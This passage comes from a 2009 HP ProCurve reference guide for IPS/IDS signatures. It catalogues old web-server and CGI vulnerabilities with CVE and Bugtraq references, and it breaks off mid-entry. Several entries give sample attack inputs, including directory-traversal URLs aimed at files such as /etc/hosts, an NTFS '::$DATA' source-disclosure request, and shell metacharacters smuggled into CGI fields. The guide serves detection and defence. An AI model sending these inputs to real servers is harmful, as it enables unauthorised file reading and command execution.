Signature ID - Hewlett Packard Enterprise Support Center
ProCurve
Switches
ProCurve 5400zl
Threat Management
Services zl Module
Installation and Getting Started Guide
IPS/IDS Signature Reference Guide
Version RLX.10.2.2.94
© Copyright 2009 Hewlett-Packard Development Company, LP. The
information contained herein is subject to change without notice.
Publication Date
May 2009
HEWLETT-PACKARD COMPANY MAKES NO WARRANTY OF ANY KIND
WITH REGARD TO THIS MATERIAL, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE. Hewlett-Packard shall not be liable for errors
contained herein or for incidental or consequential damages in connection
with the furnishing, performance, or use of this material.
The only warranties for HP products and services are set forth in the express
warranty statements accompanying such products and services. Nothing
herein should be construed as constituting an additional warranty. HP shall
not be liable for technical or editorial errors or omissions contained herein.
Applicable Products
HP ProCurve Threat Management Services zl Module (J9155A)
HP ProCurve Threat Management Services zl Module with 1-year IPS subscription service bundle (J9156A)
Disclaimer
Hewlett-Packard assumes no responsibility for the use or reliability of its
software on equipment that is not furnished by Hewlett-Packard.
Warranty
See the Customer Support/Warranty booklet included with the product.
Trademark Credits
Microsoft®, Windows®, and Windows NT® are US registered trademarks
of Microsoft Corporation.
Adobe® and Acrobat® are trademarks of Adobe Systems Incorporated.
Java™ is a US trademark of Sun Microsystems, Inc.
Hewlett-Packard Company
8000 Foothills Boulevard, m/s 5551
Roseville, California 95747-5551
www.procurve.com
A copy of the specific warranty terms applicable to your Hewlett-Packard
products and replacement parts can be obtained from your HP Sales and
Service Office or authorized dealer.
ProCurve TMS zl Module IPS/IDS Signature
Reference Guide Version RLX.10.2.2.94
Signature ID: 1
BEA WebLogic URL JSP Request Source Code Disclosure Vulnerability
Threat Level: Warning
Bugtraq: 2527 Nessus: 10715,10949
Signature Description: BEA Systems WebLogic Server is an enterprise level web and wireless application server.
Apache Tomcat is a Servlet container developed by the Apache Software Foundation (ASF). BEA Systems Weblogic
Server 5.1, Apache Software Foundation Tomcat 4.0, and Apache Software Foundation Tomcat 3.2.1 can be tricked
into revealing the source code of JSP scripts by using simple URL encoding of characters in the file name extension.
For example, a request for default.js%70 (which decodes to default.jsp) is not treated as a script but served as a plain document.
Signature ID: 2
ColdFusion exprcalc.cfm File Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0477 CVE-1999-0455 Bugtraq: 115 Nessus: 10001
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. Allaire ColdFusion Server 2.0, 3.0
and 4.0 contain a flaw that may lead to an unauthorized information disclosure. It is possible to read arbitrary files on
the remote server using the CGI: /cfdocs/expeval/exprcalc.cfm. This CGI allows anyone to view, delete and upload
anything on the remote ColdFusion Application server.
Signature ID: 4
IIS4 ExAir Sample Site DoS Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0449 Bugtraq: 193 Nessus: 10002
Signature Description: Microsoft IIS (Internet Information Services, formerly called Internet Information Server) is a
set of Internet-based services for servers using Microsoft Windows. Microsoft IIS 4.0 comes with the sample site called
'ExAir'. Unfortunately, one of its pages, namely 'advsearch.asp', may be used to make IIS hang, thus preventing it from
answering to legitimate clients. This happens if the required DLLs are not running in the system.
Signature ID: 5
IIS4 ExAir Sample Site DoS Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0449 Bugtraq: 193 Nessus: 10003,10002
Signature Description: Microsoft IIS (Internet Information Services, formerly called Internet Information Server) is a
set of Internet-based services for servers using Microsoft Windows. Microsoft IIS 4.0 comes with the sample site called
'ExAir'. Unfortunately, one of its pages, namely 'query.asp', may be used to make IIS hang, thus preventing it from
answering to legitimate clients. This happens if the required DLLs are not running in the system.
Signature ID: 6
IIS4 ExAir Sample Site DoS Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0449 Bugtraq: 193 Nessus: 10004,10002
Signature Description: Microsoft IIS (Internet Information Services, formerly called Internet Information Server) is a
set of Internet-based services for servers using Microsoft Windows. Microsoft IIS 4.0 comes with the sample site called
'ExAir'. Unfortunately, one of its pages, namely 'search.asp', may be used to make IIS hang, thus preventing it from
answering to legitimate clients. This happens if the required DLLs are not running in the system.
Signature ID: 7
Alibaba get32.exe Arbitrary Command Execution Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0885 Bugtraq: 770 Nessus: 10011
Signature Description: A computer program that is responsible for accepting HTTP requests from web clients and
serving them HTTP responses along with optional data contents, which usually are web pages such as HTML
documents and linked objects (images, etc.) is known as a web server. Alibaba Web Server 2.0 contains a flaw that may
allow a remote attacker to execute arbitrary commands. The vulnerability lies in the program 'get32.exe'. This program
does not sanitize user-supplied input. By appending additional commands via a '|' character, arbitrary commands can be
executed under the privileges of the web server.
Signature ID: 8
Alibaba.pl CGI Command Execution Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0885 Bugtraq: 770 Nessus: 10013,10011
Signature Description: A computer program that is responsible for accepting HTTP requests from web clients and
serving them HTTP responses along with optional data contents, which usually are web pages such as HTML
documents and linked objects (images, etc.) is known as a web server. Alibaba Web Server 2.0 contains a flaw that may
allow a remote attacker to execute arbitrary commands. The vulnerability lies in the Alibaba.pl cgi. This script does not
sanitize arguments supplied to it. With a specially crafted request, an attacker can provide additional commands that
will be executed.
Signature ID: 9
Alibaba tst.bat CGI Command Execution Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0885 Bugtraq: 770 Nessus: 10014,10011
Signature Description: A computer program that is responsible for accepting HTTP requests from web clients and
serving them HTTP responses along with optional data contents, which usually are web pages such as HTML
documents and linked objects (images, etc.) is known as a web server. Alibaba Web Server 2.0 contains a flaw that may
allow a remote attacker to execute arbitrary commands. The vulnerability lies in the tst.bat CGI. The script does not
sanitize arguments supplied to it. With a specially crafted request, an attacker can provide additional commands that
will be executed.
Signature ID: 10
Altavista Intranet Search Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0039 Bugtraq: 896 Nessus: 10015
Signature Description: A search engine is an information retrieval system designed to help find information stored on a
computer or a network of computers. An intranet is a private computer network that uses Internet protocols and
network connectivity to securely share part of an organization's information or operations with its employees. AltaVista
Intranet Search versions 2.3A and 2.0b contain a flaw in the "query" CGI that allows a remote attacker to read arbitrary files outside
of the web path. The issue is due to the "query" CGI not properly sanitizing user input, specifically traversal-style sequences
(../../) supplied via the "mss" variable. Due to this vulnerability, it is possible to read the content of any file on the
remote host by making the request: GET /cgi-bin/query?mss=%2e%2e/some_file.
Signature ID: 13
Httpd input2.bat arbitrary command execution Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0947 Bugtraq: 762 Nessus: 10016
Signature Description: A computer program that is responsible for accepting HTTP requests from web clients and
serving them HTTP responses along with optional data contents, which usually are web pages such as HTML
documents and linked objects (images, etc.) is known as a web server. AN-HTTPd server is one such server. If one of
these CGIs is installed on the AN-HTTPd 1.2b server (cgi-bin/test.bat, cgi-bin/input.bat, cgi-bin/input2.bat or
ssi/envout.bat), it is possible to misuse them to make the remote server execute arbitrary commands. This signature
detects attacks using the input2 and test batch files.
Signature ID: 14
Httpd envout.bat cgi vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0947 Bugtraq: 762 Nessus: 10016
Signature Description: A computer program that is responsible for accepting HTTP requests from web clients and
serving them HTTP responses along with optional data contents, which usually are web pages such as HTML
documents and linked objects (images, etc.) is known as a web server. AN-HTTPd server is one such server. If one of
these CGIs is installed on the AN-HTTPd 1.2b server (cgi-bin/test.bat, cgi-bin/input.bat, cgi-bin/input2.bat or
ssi/envout.bat), it is possible to misuse them to make the remote server execute arbitrary commands. This signature
detects attacks that use envout.bat.
Signature ID: 15
Anacondaclip cgi directory traversal vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0593 Bugtraq: 2512 Nessus: 10644
Signature Description: Anaconda! Partners is a Massachusetts based company formed in 1999 to bring engaging
content easily and quickly to websites around the world. Clipper is a headline-gathering tool from Anaconda! Partners
that allows Web site operators to integrate headlines from a variety of news sources into their web site. Anaconda
Partners Clipper 3.3 and earlier could allow a remote attacker to traverse directories on the web server. A remote
attacker can send a URL request containing "dot dot" sequences (/../) to traverse directories and view arbitrary files on
the web server.
Signature ID: 16
Apache DIR listing cgi vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0731 Bugtraq: 3009 Nessus: 10704
Signature Description: The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP
server for modern operating systems including UNIX and Windows. Apache HTTP Server has been the most popular
HTTP server on the World Wide Web. By making requests ending with '?M=A' or '?S=D' to the Apache web server
1.3.20, with Multiviews enabled, it is sometimes possible to obtain a directory listing even if an index.html file is
present.
Signature ID: 17
Apache ASP 1.95 source.asp cgi vulnerability
Threat Level: Severe
Industry ID: CVE-2000-0628 Bugtraq: 1457 Nessus: 10480
Signature Description: The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP
server for modern operating systems including UNIX and Windows. Apache HTTP Server is the most popular HTTP
server on the World Wide Web. Apache::ASP module provides support for Active Server Pages on the Apache Web
Server with Perl scripting, and enables developing of dynamic web applications with session management and
embedded Perl code. Apache::ASP module 1.93 and earlier come with a source.asp file that allows anyone to write to
files in the '/site/eg/' directory. An attacker may use this flaw to upload his own scripts and execute arbitrary commands
on this host.
Signature ID: 18
Microsoft IIS ASP Alternate Data Streams Source Disclosure Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0278 Bugtraq: 149 Nessus: 10362
Signature Description: Microsoft Internet Information Server (IIS) is a web server for Windows platform. IIS versions
4.0 and prior are vulnerable to a source code disclosure vulnerability. NTFS supports multiple data streams within a
file. The main data stream, which stores the primary content, has an attribute called $DATA. Accessing this NTFS
stream through IIS from a browser such as http://xyz/myasp.asp::$DATA may display the contents of a file
(myasp.asp) that is normally set to be acted upon by an Application Mapping. Files which are granted read access and
are on NTFS file system can be viewed by the remote user.
Signature ID: 19
ASP Source Code Disclosure DOT Cgi Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0253 CVE-1999-0154 Bugtraq: 1814 Nessus: 10363
Signature Description: Microsoft IIS (Internet Information Services, formerly called Internet Information Server) is a
set of Internet-based services for servers using Microsoft Windows. In IIS versions 2.0 and 3.0, it is possible to get the
source code of the remote ASP scripts by appending '%2e' instead of a '.' (dot) at the end of the request (ex: GET
/default%2easp). ASP source codes usually contain sensitive information such as logins and passwords.
Signature ID: 20
HIS Software Auktion 1.62 Directory Traversal Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0212 Bugtraq: 2367 Nessus: 10638
Signature Description: HIS Auktion is a CGI script for hosting and managing online auctions. A remote user could
gain read access to known files outside of the root directory where HIS Software Auktion 1.62 resides. Requesting a
specially crafted URL composed of '../' sequences along with the known filename will disclose the requested file. This
vulnerability could also lead to the execution of arbitrary code.
Signature ID: 21
AXIS StorPoint Vulnerability
Threat Level: Severe
Industry ID: CVE-2000-0191 Bugtraq: 1025 Nessus: 10023
Signature Description: AXIS StorPoint CD+ is a CD/DVD server for efficiently storing and sharing CD/DVD media
across networks. It is possible to access the remote AXIS StorPoint configuration by requesting:
http://server/cd/../config/html/cnf_gi.htm. Gaining such information can be the starting point of a more serious attack, as
the attacker has some idea about the system configuration.
Signature ID: 22
Basilix WebMail Incorrect File Permissions Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1044 Bugtraq: 2198 Nessus: 10601
Signature Description: BasiliX is a webmail application based on PHP and IMAP, and powered with the MySQL
database server. Basilix Webmail System version 0.9.7beta is vulnerable to Information Disclosure. If the Web server
is not configured to recognize files with .class or .inc extensions as PHP scripts at the httpd.conf file, a remote attacker
can send an HTTP request to view these files, which may contain sensitive data, such as the MySQL password and
username information. As a workaround, define the .class and .inc file extensions as PHP files, and then deny read
permissions from untrusted users.
Signature ID: 23
Sun's Java Web Server Bboard Servlet vulnerability
Threat Level: Critical
Industry ID: CVE-2000-0629 Bugtraq: 1459 Nessus: 10507
Signature Description: Sun Java Web Server is a web server designed for medium and large business applications. In Sun
Java Web Server 2.0 and Sun Java Web Server 1.1.3, the example 'bboard' servlet has a well known security flaw that
lets anyone execute arbitrary commands with the privileges of the http daemon (root or nobody). Therefore access to
this program from outside is suspicious.
Signature ID: 24
Bigconf cgi File View vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1550 Bugtraq: 0778 Nessus: 10027
Signature Description: BigIP is a load balancing system from F5 software. It has a web-based configuration system,
which is vulnerable to several standard CGI attacks. The 'bigconf' cgi has a well known security flaw that lets anyone
view arbitrary files on the system on which it is installed. F5 BigIP 2.0 is vulnerable.
Signature ID: 25
Bizdb1 search cgi vulnerability
Threat Level: Severe
Industry ID: CVE-2000-0287 Bugtraq: 1104 Nessus: 10383
Signature Description: BizDB is a web database integration product using perl CGI scripts. One of the scripts,
bizdb-search.cgi, passes a variable's contents to an unchecked open() call and can therefore be made to execute commands at
the privilege level of the webserver. The variable is dbname, and if passed a semicolon followed by shell commands
they will be executed. This cannot be exploited from a browser, as the software checks for a referrer field in the HTTP
request. A valid referrer field can however be created and sent programmatically or via a network utility like netcat.
CNC Technology BizDB 1.0 is vulnerable.
Signature ID: 26
Access to Vulnerable Cachemgr CGI
Threat Level: Warning
Industry ID: CVE-1999-0710 Bugtraq: 2059 Nessus: 10034
Signature Description: Squid is a caching proxy for the Web, supporting HTTP, HTTPS, FTP, and more. The
'cachemgr.cgi' module is a management interface for the Squid proxy service. It is installed by default in a public web
directory ('/cgi-bin'), by multiple versions of Red Hat Linux (from 5.2 to FEDORA CORE 3), if the Squid package is
selected during installation. Other flavours of linux including Debian Linux 3.0 also provide the same script if Squid
package is selected during installation. This script prompts for a host and port, which it then tries to connect to. If a
webserver such as Apache is running, this can be used to connect to arbitrary hosts and ports, allowing for potential use
as an intermediary in denial-of-service attacks, proxied port scans, etc. Interpreting the output of the script can allow
the attacker to determine whether or not a connection was established. Therefore, access to this script from outside may
be suspicious and the administrator is advised to check the system's log.
Signature ID: 27
Calendar admin cgi vulnerability attempt
Threat Level: Severe
Industry ID: CVE-2000-0432 Bugtraq: 1215 Nessus: 10506
Signature Description: Matt Kruse's Calendar script is a popular, free perl cgi-script used by many websites on the
Internet. It allows a website administrator to easily setup and customize a calendar on their website. There are two
components of this package, calendar-admin.pl and calendar.pl. In Matt Kruse Calendar Script 2.2, calendar-admin.pl
calls open() with user input in the command string without parsing the input for metacharacters. It is therefore possible
to execute arbitrary commands on the target host by passing "|shell command|" as one value of the "configuration file"
field. The shell that is spawned with the open() call will then execute those commands with the uid of the webserver.
This can result in remote access to the system for the attacker. Calendar.pl is vulnerable to a similar attack.
Signature ID: 30
ColdFusion Debug cgi vulnerability
Threat Level: Warning
Nessus: 10797
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. In versions 4.5 and 5.0 (and
probably in older versions), it is possible to see the ColdFusion Debug Information by appending ?Mode=debug at the
end of the request (like GET /index.cfm?Mode=debug). The Debug Information usually contains sensitive data such as
the Template Path or Server Version, which may provide information for use in subsequent attacks.
Signature ID: 32
Cgicso command execution cgi vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1652 Bugtraq: 6141 Nessus: 10779
Signature Description: CGIEmail is a form processing script, written in the C language. It allows account holders to set
up feedback forms with the input from users being directed to the configured e-mail recipient. It takes the contents of a
form specified in a html file and emails them to a specified location. A mail specification in a text file is used to format
and mail the resulting email message. Buffer overflow in cgicso.c for cgiemail 1.6 allows remote attackers to cause a
denial of service (crash) and possibly execute arbitrary code via a long query parameter.
Signature ID: 33
Cgiforum cgi vulnerability
Threat Level: Severe
Industry ID: CVE-2000-1171 Bugtraq: 1963 Nessus: 10552
Signature Description: CGIForum is a commercial cgi script from Markus Triska which is designed to facilitate
web-based threaded discussion forums. In Markus Triska CGIForum 1.0, the 'cgiforum.pl' has a well known security flaw.
The script improperly validates user-supplied input to the "thesection" parameter. If an attacker supplies a
carefully-formed URL containing '/../' sequences as argument to this parameter, the script will traverse the normal directory
structure of the application in order to find the specified file. As a result, it is possible to remotely view arbitrary files
on the host which are readable by user 'nobody'.
Signature ID: 35
Cobalt RaQ Cgiwrap cgi vulnerability
Threat Level: Severe
Industry ID: CVE-1999-1530 CVE-2000-0431 Bugtraq: 777,1238 Nessus: 10041
Signature Description: The Cobalt RaQ is a 1U rackmount server product line developed by Cobalt Networks, Inc.
(later purchased by Sun Microsystems) featuring a modified Red Hat Linux operating system and a proprietary GUI for
server management. Cobalt RaQ 2 and RaQ 3 servers come with a program called "cgiwrap", which acts as a wrapper
for cgi programs, so that they run with the uid of their user instead of 'nobody'. cgiwrap as used on Cobalt RaQ 2.0 and
RaQ 3i does not properly identify the user for running certain scripts. This allows a malicious site administrator to view
or modify data located at another virtual site on the same system. Also, if the files are uploaded from FrontPage, the
files are owned by the 'httpd' user. This allows an override of user privileges due to the configuration settings of the Apache
server.
Signature ID: 36
Allaire ColdFusion Server (4.5.1) Administrator Login Password DoS Vulnerability
Threat Level: Severe
Industry ID: CVE-2000-0538 Bugtraq: 1314 Nessus: 10581
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. A denial of service vulnerability
exists within the Allaire ColdFusion web application server (version 4.5.1 and earlier) which allows an attacker to
overwhelm the web server and deny legitimate web page requests. By downloading and altering the login HTML form
an attacker can send overly large passwords (>40,0000 chars) to the server, causing it to stop responding.
Signature ID: 37
Commerce cgi access vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0210 Bugtraq: 2361 Nessus: 10612
Signature Description: Commerce.CGI is a Free ecommerce shopping cart program with a web based store manager
application for managing online stores. The Carey Internet Services Commerce.cgi version 2.0.1 has a well known
security flaw that lets an attacker read arbitrary files with the privileges of the http daemon (usually root or nobody).
Adding the string "/../%00" in front of a web page document will allow a remote attacker to view any files
on the server, provided that the HTTPd has the correct permissions. For example:
http://www.example.com/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
Signature ID: 38
Access to Vulnerable CGI Count.cgi
Threat Level: Severe
Industry ID: CVE-1999-0021 Bugtraq: 128 Nessus: 10049
Signature Description: The wwwCount 'Count.cgi' program is used to record and display the number of times a WWW
page has been accessed. Due to insufficient bounds checking on arguments which are supplied by users in wwwCount
2.3, it is possible to overwrite the internal stack space of the Count.cgi program while it is executing. By supplying a
carefully designed argument to the Count.cgi program (QUERY_STRING environment variable), intruders may be
able to force Count.cgi to execute arbitrary commands with the privileges of the httpd process.
Signature ID: 40
Access to vulnerable version cvsweb.cgi
Threat Level: Warning
Industry ID: CVE-2000-0670 Bugtraq: 1469 Nessus: 10402
Signature Description: CVSweb is a web interface for a CVS repository. It allows users to browse through the source
code history of projects. The cvsweb CGI script in CVSWeb 1.80 allows remote attackers with write access to a CVS
repository to execute arbitrary commands via shell metacharacters. CVSWeb Developer CVSWeb 1.80 is vulnerable.
Signature ID: 42
Access to Vulnerable Dbman CGI
Threat Level: Warning
Industry ID: CVE-2000-0381 Bugtraq: 1178
Signature Description: DBMan is a full-featured Database Manager that provides a web interface to add, remove,
modify or view records in a flatfile ascii database. It is possible to cause the DBMan 2.0.4 CGI to reveal sensitive
information, by requesting an invalid database file from a web server such as: GET
/scripts/dbman/db.cgi?db=nonexistant-db. An attacker can thus gain access to critical information that may be used in
further attacks.
Signature ID: 43
Dcforum cgi vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0436 CVE-2001-0437 CVE-2001-0527 Bugtraq: 2611,2728 Nessus: 10583
Signature Description: DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based
threaded discussion forums. The 'dcforum' CGI in versions 1.0 to 6.0 and 2000v1.0 has a well known security flaw that
lets an attacker execute arbitrary commands with the privileges of the http daemon (usually root or nobody). DCForum
fails to properly validate user-supplied input to the script. By inserting shell commands in submitted querystrings, an
attacker can cause the script to open and parse commands in an external file on the target system. By supplying a long
path (containing '/../' sequences) an attacker can force the script to open a file from arbitrary locations on the filesystem.
Most of the 'DC Scripts DCForum' are vulnerable.
Signature ID: 44
Directorypro CGI Traversal Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0780 Bugtraq: 2793 Nessus: 10679
Signature Description: Webdirectory Pro is a web application used to create a searchable directory of links developed
by Cosmicperl. The CGI 'directorypro.cgi' in Cosmicperl Directory Pro 2.0 has a well known security flaw that lets an
attacker read arbitrary files with the privileges of the http daemon (usually root or nobody). The value of the 'show'
variable is not properly validated and can be used to force 'directorypro.cgi' to output the contents of an arbitrary
webserver-readable file to a remote attacker. This is due to a lack of checks for NULL bytes in user-supplied data.
Signature ID: 45
Access to /doc Directory vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0678 Bugtraq: 318 Nessus: 10056
Signature Description: A default configuration of Apache on Debian Linux sets the ServerRoot to /usr/doc, which
allows remote users to read documentation files for the entire server. Therefore the /doc directory is browsable. /doc shows
the content of the /usr/doc and /doc/package directories and therefore reveals information about installed programs and, more
importantly, their versions. Debian Linux 2.1 is vulnerable.
Signature ID: 61
Access to Domino db related .nsf files detected
Threat Level: Warning
Nessus: 10629
Signature Description: The remote Lotus Domino server allows an anonymous user to access sensitive information
such as users, databases, configuration of servers. Lotus Domino server is vulnerable to information disclosure. A
successful exploitation of this vulnerability allows an attacker to access sensitive information on the vulnerable system.
This signature specifically detects "nsf" pattern in the traffic sent to the http server.
Signature ID: 62
Access to Domino db sensitive files detected
Threat Level: Warning
Nessus: 10629
Signature Description: The remote Lotus Domino server allows an anonymous user to access sensitive information
such as users, databases, configuration of servers. Lotus Domino server is vulnerable to information disclosure. A
successful exploitation of this vulnerability allows an attacker to access sensitive information on the vulnerable system.
This signature specifically detects "mail.box" pattern in the traffic sent to the http server.
Signature ID: 64
Dumpenv cgi vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1178 Bugtraq: 2255 Nessus: 10060
Signature Description: Sambar server is a multi-threaded, extensible application server with a highly programmable API.
It has virtual domain support with independent document/CGI directories, log files, and error templates. 'dumpenv.pl' is
a utility that displays environment information about the host on which the server resides. In Sambar Server 4.1, this utility
displays sensitive information. This information could include the server software version being used, directory settings
and path information. This information may help an attacker in subsequent attacks.
Signature ID: 65
Empower path cgi vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0224 Bugtraq: 2374 Nessus: 10609
Signature Description: Brightstation Muscat is a search engine application. It is possible to get the physical location of
a virtual web directory of a host in Brightstation Muscat 1.0 by issuing an invalid request in the DB parameter (for
example: GET /cgi-bin/empower?DB=whatever HTTP/1.0). Remote attackers can thus gain access to sensitive
information, which may assist in further attacks against the host.
Signature ID: 67
Eshop cgi arbitrary command execution vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1014 Bugtraq: 3340
Signature Description: Webdiscount E-Shop Online Shop System is a web commerce application. It is written and
maintained by Michael Boehme. A problem exists in a default implementation of the Michael Boehme WebDiscount
E-Shop Online-Shop System 1.0 that may allow a user to pass malicious input to the script. This is due to
insufficient sanitization of input from untrusted sources. For example, an attacker can use shell metacharacters (';', '|', etc.),
which will allow arbitrary commands to be executed by the host with the privileges of the webserver process.
Successful exploitation of this issue may cause sensitive information to be disclosed to the attacker.
Signature ID: 69
Excite for Web Servers 1.1 Command Execution Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0279 Bugtraq: 2248 Nessus: 10064
Signature Description: Excite for Web Servers is a search engine suite for web servers running under Windows NT and
UNIX. Excite Excite for Web Servers 1.1 has a well known security flaw that lets anyone execute arbitrary commands
with the privileges of the http daemon (root or nobody). It allows remote command execution via shell metacharacters
due to insufficient input validation in architext_query.pl script.
Signature ID: 70
Faxsurvey cgi vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0262 Bugtraq: 2056 Nessus: 10067
Signature Description: Hylafax is a popular fax server software package designed to run on multiple UNIX operating
systems. Unpatched versions of Hylafax 4.0 pl2 ship with an insecure script, faxsurvey, which allows remote command
execution with the privileges of the web server process. This can be exploited simply by passing the command as a
parameter to the script. Consequences could include web site defacement, exploitation of locally accessible vulnerabilities
to gain further privileges, etc.
Signature ID: 71
FormHandler cgi vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1051 CVE-1999-1050 Bugtraq: 799 Nessus: 10075
Signature Description: Matt Wright FormHandler.cgi is a form handling script that helps in validation and management
of user submitted data. Any file that the Matt Wright FormHandler.cgi 2.0 has read access to (the cgi is typically run as
user 'nobody' on Unix systems) can be specified as an attachment in a reply email. This could allow an attacker to gain
access to sensitive files such as /etc/passwd simply by modifying the form document.
Signature ID: 75
FrontPage 97/98 Htimage.exe buffer overflow vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0122 CVE-2000-0256 Bugtraq: 1117 Nessus: 10376
Signature Description: Two components of FrontPage 97 and 98 Server Extensions, Htimage.exe and Imagemap.exe,
contain unchecked buffers. If carefully chosen arguments were supplied to these components, they could be made to
run code via a classic buffer overrun vulnerability. The buffer overflow occurs when the remote htimage.exe CGI is
given the request: /cgi-bin/htimage.exe/[long string]?0,0
Signature ID: 76
Access to Microsoft Frontpage Extensions vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0386 CVE-2000-0114 CVE-2000-0260 Bugtraq: 1108,989,1109 Nessus: 10077,10369
Signature Description: FrontPage extensions provide the user with the ability to remotely create and manipulate web
site files on the server. The FrontPage extensions in Microsoft InterDev 1.0 and Microsoft FrontPage 98 Server
Extensions for IIS allow a remote attacker to read files on the server by using a nonstandard URL. Specifically, two
DLLs (dvwssr.dll and mtd2lv.dll) include an obfuscation string that manipulates the name of requested files. Knowing
this string and the obfuscation algorithm allows anyone with web authoring privileges on the target host to download
any .asp or .asa source on the system (including files outside the web root, through use of the '../' string). This
includes users with web authoring rights to only one of several virtual hosts on a system, allowing one company to
potentially gain access to the source of another company's website if hosted on the same physical machine.
Signature ID: 77
Access to Microsoft Frontpage _vti_pvt directory vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0386 CVE-2000-0260 Bugtraq: 1108,989,1109 Nessus: 10078,10369
Signature Description: FrontPage extensions provide the user with the ability to remotely create and manipulate web
site files on the server. The FrontPage extensions in Microsoft InterDev 1.0 and Microsoft FrontPage 98 Server
Extensions for IIS allow a remote attacker to read files on the server by using a nonstandard URL. Specifically, two
DLLs (dvwssr.dll and mtd2lv.dll) include an obfuscation string that manipulates the name of requested files. Knowing
this string and the obfuscation algorithm allows anyone with web authoring privileges on the target host to download
any .asp or .asa source on the system (including files outside the web root, through use of the '../' string). This
includes users with web authoring rights to only one of several virtual hosts on a system, allowing one company to
potentially gain access to the source of another company's website if hosted on the same physical machine. Remote
attackers can view the contents of the authors.pwd configuration file by sending a HyperText Transfer Protocol (HTTP)
request. The attacker can then crack the passwords stored in this file and use them to gain unauthorized access
to the affected server.
Signature ID: 78
Access to Microsoft Frontpage dvwssr.dll vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0260 Bugtraq: 1108,1109 Nessus: 10369
Signature Description: FrontPage extensions provide the user with the ability to remotely create and manipulate web
site files on the server. Microsoft InterDev 1.0 and Microsoft FrontPage 98 Server Extensions for IIS ship with a dvwssr.dll
file that is vulnerable to a buffer overflow that allows anyone to execute arbitrary commands on the server or cause a
denial of service in the case of unsuccessful attack attempts. This file is found in the /_vti_bin/_vti_aut/ path.
Signature ID: 79
Shtml.exe reveals full path vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0413 CVE-2002-0072 Bugtraq: 1174,4479 Nessus: 10405,10937
Signature Description: FrontPage extensions provide the user with the ability to remotely create and manipulate web
site files on the server. The FrontPage extensions package of IIS 4.0 and 5.0, and FrontPage Server
Extensions 1.1 and prior, ship with a vulnerable shtml.exe or shtml.dll (depending on platform) that discloses the full
path to the remote web root when it is given a non-existent file as an argument. For example, performing a request for
http://target/_vti_bin/shtml.dll/non_existant_file.html will produce an error message stating "Cannot open
"C:\localpath\non_existant_file.html": no such file or folder". Such information can help an attacker in subsequent
attacks.
Signature ID: 80
Access to vulnerable aglimpse cgi
Threat Level: Severe
Industry ID: CVE-1999-0147 Bugtraq: 2026 Nessus: 10095
Signature Description: Vulnerabilities exist in the GlimpseHTTP and WebGlimpse packages. Both of these packages
provide a web interface which allows users to use Glimpse, an indexing and query system, to provide a search facility
for your web site. The cgi-bin programs in these packages perform insufficient argument checking. Due to this,
intruders may be able to execute arbitrary commands with the privileges of the httpd process. GlimpseHTTP 2.0 is
known to be vulnerable in this fashion. The authors of GlimpseHTTP and WebGlimpse also believe earlier versions of
both GlimpseHTTP (prior to 2.0) and WebGlimpse (prior to 1.5) may be vulnerable to similar attacks. There are reports
of attacks using the aglimpse cgi-bin program (part of GlimpseHTTP).
Signature ID: 82
Access to vulnerable guestbook.pl (.cgi) script
Threat Level: Warning
Industry ID: CVE-1999-0237 CVE-2002-0730 CVE-1999-1053 Bugtraq: 776,4566 Nessus: 10099,10098
Signature Description: A guestbook script allows visitors to sign and leave greetings on the website. Two different
guestbook CGIs, Matt Wright GuestBook 2.3 and Philip Chinery's Guestbook 1.1, are exploitable on Apache servers.
Matt Wright GuestBook 2.3 allows for remote command execution, including displaying of any files to which the web
server has read access. Philip Chinery's Guestbook 1.1 does not filter script code from form fields. As a result, it is
possible for an attacker to inject script code into pages that are generated by the guestbook. Additionally, script code is
not filtered from URL parameters, making the guestbook prone to cross-site scripting attacks.
Signature ID: 83
Access to vulnerable cgi script 'Handler'
Threat Level: Severe
Industry ID: CVE-1999-0148 Bugtraq: 380 Nessus: 10100
Signature Description: IRIX is a computer operating system developed by Silicon Graphics, Inc. to run natively on
their 32- and 64-bit MIPS architecture workstations and servers. A vulnerability exists in the cgi-bin program 'handler',
as included by Silicon Graphics in their IRIX operating system. This vulnerability will allow a remote attacker to execute
arbitrary commands on the vulnerable host as the user the web server is running as. This can easily result in a user
